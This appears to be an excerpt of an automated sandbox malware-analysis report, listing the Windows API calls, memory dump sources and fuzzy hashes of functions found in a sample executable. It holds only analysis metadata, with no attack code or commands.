                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID:
                                                            • API String ID: 1211466189-0
                                                            • Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                            • Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
                                                            • Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                            • Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                            • Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
                                                            • Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                            • Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                                                              • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                              • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00467130
                                                            • _memmove.LIBCMT ref: 0046717E
                                                            • _memmove.LIBCMT ref: 0046719B
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 256516436-0
                                                            • Opcode ID: 5c71d80941ca80f5ee531bff5a83870a479956e321588193e8cc6d96fef7cf6a
                                                            • Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
                                                            • Opcode Fuzzy Hash: 5c71d80941ca80f5ee531bff5a83870a479956e321588193e8cc6d96fef7cf6a
                                                            • Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 004861EB
                                                            • GetDC.USER32(00000000), ref: 004861F3
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                            • Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
                                                            • Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                            • Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68
                                                            APIs
                                                              • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                              • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                              • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                            • _wcstok.LIBCMT ref: 0046EC94
                                                            • _wcscpy.LIBCMT ref: 0046ED23
                                                            • _memset.LIBCMT ref: 0046ED56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                            • String ID: X
                                                            • API String ID: 774024439-3081909835
                                                            • Opcode ID: d2c70786a1cc222465641166f330adecaf4d8f6fb7fd2aa8fbe6c6f5a27b1298
                                                            • Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
                                                            • Opcode Fuzzy Hash: d2c70786a1cc222465641166f330adecaf4d8f6fb7fd2aa8fbe6c6f5a27b1298
                                                            • Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B
                                                            APIs
                                                            • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00476C00
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00476C34
                                                            • htons.WSOCK32(?), ref: 00476CEA
                                                            • inet_ntoa.WSOCK32(?), ref: 00476CA7
                                                              • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
                                                              • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
                                                            • _strlen.LIBCMT ref: 00476D44
                                                            • _memmove.LIBCMT ref: 00476DAD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                            • String ID:
                                                            • API String ID: 3619996494-0
                                                            • Opcode ID: 74bf75fca8117d4280a773217e344f06ef535c4d5ef814debfba2515503ad3c0
                                                            • Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
                                                            • Opcode Fuzzy Hash: 74bf75fca8117d4280a773217e344f06ef535c4d5ef814debfba2515503ad3c0
                                                            • Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                            • Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
                                                            • Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                            • Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9
                                                            APIs
                                                            • IsWindow.USER32(00D655A0), ref: 0048B3EB
                                                            • IsWindowEnabled.USER32(00D655A0), ref: 0048B3F7
                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                                                            • SendMessageW.USER32(00D655A0,000000B0,?,?), ref: 0048B512
                                                            • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                                                            • GetWindowLongW.USER32(00D655A0,000000EC), ref: 0048B571
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                            • String ID:
                                                            • API String ID: 4072528602-0
                                                            • Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                            • Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
                                                            • Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                            • Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98
                                                            APIs
                                                            • _memset.LIBCMT ref: 0047F448
                                                            • _memset.LIBCMT ref: 0047F511
                                                            • ShellExecuteExW.SHELL32(?), ref: 0047F556
                                                              • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                              • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                              • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                            • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                                                            • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                            • String ID: @
                                                            • API String ID: 3522835683-2766056989
                                                            • Opcode ID: 65c6d4541a5957c05215061cc8cd0f59e5773d27fbd8cd7ace82404b80ebb491
                                                            • Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
                                                            • Opcode Fuzzy Hash: 65c6d4541a5957c05215061cc8cd0f59e5773d27fbd8cd7ace82404b80ebb491
                                                            • Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88
                                                            APIs
                                                            • GetParent.USER32(?), ref: 00460F8C
                                                            • GetKeyboardState.USER32(?), ref: 00460FA1
                                                            • SetKeyboardState.USER32(?), ref: 00461002
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                            • Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
                                                            • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                            • Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 00460DA5
                                                            • GetKeyboardState.USER32(?), ref: 00460DBA
                                                            • SetKeyboardState.USER32(?), ref: 00460E1B
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                            • Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
                                                            • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                            • Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00B98311,?,00000000,?,00000000,00000000), ref: 00B97BDE
                                                            • __fassign.LIBCMT ref: 00B97C59
                                                            • __fassign.LIBCMT ref: 00B97C74
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00B97C9A
                                                            • WriteFile.KERNEL32(?,?,00000000,00B98311,00000000,?,?,?,?,?,?,?,?,?,00B98311,?), ref: 00B97CB9
                                                            • WriteFile.KERNEL32(?,?,00000001,00B98311,00000000,?,?,?,?,?,?,?,?,?,00B98311,?), ref: 00B97CF2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: a5a84b8d3a607029adc63176336c7a46ea7c24ecd790dbf88ae79d7558e317c6
                                                            • Instruction ID: 29334b196129ac4841ba89bb6be03399c190fb6dcde1ac62042bc29ef21f2526
                                                            • Opcode Fuzzy Hash: a5a84b8d3a607029adc63176336c7a46ea7c24ecd790dbf88ae79d7558e317c6
                                                            • Instruction Fuzzy Hash: 9F51A6B1A542499FCF10CFA8DC85AEEBBF4EF09300F1445BAE955E7291DB709941CBA0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalTime
                                                            • String ID:
                                                            • API String ID: 2945705084-0
                                                            • Opcode ID: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                                            • Instruction ID: 7a6b7d837badcf90248cfae842bd011e2e93fbf2a36f5ea1b26b70f3dca78a8a
                                                            • Opcode Fuzzy Hash: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                                            • Instruction Fuzzy Hash: 5541B565D1022476CB11EBB59846ACFB7B8AF05311F90485BF508E3221FA78E285C7AE
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: ,,I$DllGetClassObject
                                                            • API String ID: 753597075-1683996018
                                                            • Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                            • Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
                                                            • Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                            • Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8
                                                            APIs
                                                            • _memset.LIBCMT ref: 004872AA
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                                                            • IsMenu.USER32(?), ref: 00487369
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                                                            • DrawMenuBar.USER32 ref: 004873C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                            • String ID: 0
                                                            • API String ID: 3866635326-4108050209
                                                            • Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                            • Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
                                                            • Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
